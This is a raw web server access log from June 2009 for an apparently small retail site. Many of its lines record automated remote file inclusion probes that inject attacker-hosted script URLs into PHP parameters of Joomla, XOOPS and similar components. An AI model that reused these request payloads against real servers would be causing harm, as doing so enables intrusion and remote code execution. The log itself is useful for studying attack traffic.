201.127.210.91 - - [16/Jun/2009:00:10:00 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
201.127.210.91 - - [16/Jun/2009:00:10:01 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
60.251.132.43 - - [16/Jun/2009:00:10:06 -0400] "GET /logs/access_log.Q109051600/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.ams-braincon.com/cms/js/copyright.txt???? HTTP/1.1" 404 378 "-" "Mozilla/5.0"
89.223.3.98 - - [16/Jun/2009:00:10:25 -0400] "GET /logs/access_log.Q109060500//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:11:05 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:11:05 -0400] "GET /logs///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:11:05 -0400] "GET ///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:11:10 -0400] "GET /logs/access_log.Q109053100%20%20///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.127.210.91 - - [16/Jun/2009:00:11:47 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45921 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
38.99.13.118 - - [16/Jun/2009:00:12:34 -0400] "GET /logs/access_log.Q108010700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
201.127.210.91 - - [16/Jun/2009:00:12:52 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45921 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
219.94.148.39 - - [16/Jun/2009:00:13:11 -0400] "GET ///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:13:11 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:13:11 -0400] "GET /logs///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:13:21 -0400] "GET /logs/access_log.Q109053100///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:00:13:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.176.230.136 - - [16/Jun/2009:00:13:34 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:00:13:34 -0400] "GET /logs/error_log.Q109041400%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:00:13:34 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:00:13:57 -0400] "GET /logs/error_log.Q109030300%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
87.230.22.39 - - [16/Jun/2009:00:15:09 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.230.22.39 - - [16/Jun/2009:00:15:09 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:00:15:34 -0400] "GET /logs/access_log.Q107100200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.49.99.7 - - [16/Jun/2009:00:15:58 -0400] "GET /logs/?_zb_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 200 5706 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:00:15:58 -0400] "GET /?_zb_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:00:16:01 -0400] "GET /logs/access_log.Q109051100/?_zb_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:00:16:36 -0400] "GET /?_zb_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:00:16:36 -0400] "GET /logs/?_zb_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 200 5706 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:00:16:36 -0400] "GET /logs/access_log.Q109051100/?_zb_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:17:11 -0400] "GET ///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:17:11 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:17:11 -0400] "GET /logs///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.94.148.39 - - [16/Jun/2009:00:17:15 -0400] "GET /logs/access_log.Q109053100///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/volcom/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:17:52 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:17:52 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:17:52 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:18:15 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:18:15 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:18:15 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:00:18:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.13.118 - - [16/Jun/2009:00:18:26 -0400] "GET /images/_notes/download_cat_instr.4_lg.jpg.mno HTTP/1.0" 200 257 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.106.135.14 - - [16/Jun/2009:00:18:27 -0400] "GET /logs/access_log.Q109060900%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:18:40 -0400] "GET /logs/access_log.Q109060900%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.176.253.56 - - [16/Jun/2009:00:21:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
67.176.253.56 - - [16/Jun/2009:00:21:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
38.99.44.103 - - [16/Jun/2009:00:21:23 -0400] "GET /logs/access_log.Q108080400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.176.253.56 - - [16/Jun/2009:00:21:24 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
67.176.253.56 - - [16/Jun/2009:00:21:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
66.249.71.54 - - [16/Jun/2009:00:21:28 -0400] "GET /images/over-index_bone.jpg HTTP/1.1" 200 1741 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [16/Jun/2009:00:23:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
63.223.104.57 - - [16/Jun/2009:00:23:43 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
63.223.104.57 - - [16/Jun/2009:00:23:43 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
91.198.32.3 - - [16/Jun/2009:00:23:46 -0400] "GET /logs/access_log.Q109060600/index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
91.198.32.3 - - [16/Jun/2009:00:23:46 -0400] "GET /logs/index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
91.198.32.3 - - [16/Jun/2009:00:23:46 -0400] "GET /index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
63.223.104.57 - - [16/Jun/2009:00:23:47 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.810"
38.99.44.103 - - [16/Jun/2009:00:24:37 -0400] "GET /logs/error_log.Q107062200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
91.198.32.3 - - [16/Jun/2009:00:24:40 -0400] "GET /logs/error_log.Q109060600/index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
74.54.32.201 - - [16/Jun/2009:00:25:47 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:25:47 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:25:47 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:25:50 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:25:50 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:25:50 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:00:26:12 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:00:26:13 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:00:26:13 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:26:16 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:26:32 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:00:26:43 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:00:26:43 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:00:26:43 -0400] "GET /logs/access_log.Q109050300%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.105.207.244 - - [16/Jun/2009:00:26:43 -0400] "GET /logs/access_log.Q109060300%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
63.223.104.57 - - [16/Jun/2009:00:26:59 -0400] "GET /logs/access_log.Q109052500//components/com_simpleboard/image_upload.php?sbp=http://www.leeminhothailand.com/board/admin.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
84.201.208.50 - - [16/Jun/2009:00:27:01 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:27:01 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:27:01 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:00:27:15 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.98.209.71 - - [16/Jun/2009:00:27:19 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:00:27:23 -0400] "GET /logs/error_log.Q108053100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.165.73.157 - - [16/Jun/2009:00:27:25 -0400] "GET /logs/access_log.Q109060600%20/index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.54.32.201 - - [16/Jun/2009:00:27:32 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:00:27:42 -0400] "GET /index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:00:27:43 -0400] "GET /logs/index.php?option=com_ijoomla_rss&act=xml&cat=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
84.201.208.50 - - [16/Jun/2009:00:27:55 -0400] "GET /logs/access_log.Q109060600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:28:10 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:00:28:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [16/Jun/2009:00:28:25 -0400] "GET /logs/access_log.Q109052900//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jun/2009:00:28:26 -0400] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jun/2009:00:28:28 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:00:28:29 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jun/2009:00:29:06 -0400] "GET /logs/access_log.Q109052100//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:29:18 -0400] "GET /logs/access_log.Q109060300%20%20/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:29:18 -0400] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:00:29:18 -0400] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:29:19 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:00:29:39 -0400] "GET /logs/access_log.Q109060600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:00:29:49 -0400] "GET /logs/access_log.Q108021500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.3.6.194 - - [16/Jun/2009:00:30:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Media Center PC 5.0; SLCC1)"
74.3.6.194 - - [16/Jun/2009:00:30:28 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Media Center PC 5.0; SLCC1)"
74.3.6.194 - - [16/Jun/2009:00:30:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Media Center PC 5.0; SLCC1)"
74.3.6.194 - - [16/Jun/2009:00:30:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Media Center PC 5.0; SLCC1)"
211.189.40.248 - - [16/Jun/2009:00:31:40 -0400] "GET /logs/error_log.Q109060500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:40 -0400] "GET /logs/error_log.Q109060500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:40 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:40 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:40 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:42 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:50 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:50 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:50 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:52 -0400] "GET /logs/access_log.Q109060500/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:52 -0400] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:52 -0400] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:58 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
211.189.40.248 - - [16/Jun/2009:00:31:59 -0400] "GET /logs/access_log.Q109060500%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
75.145.152.113 - - [16/Jun/2009:00:32:02 -0400] "GET /logs/access_log.Q109051700//bbs/skin/zero_vote/error.php//skin/zero_vote/error.php?dir=http://food114.tv/banner/shirohige/fxid.txt???? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
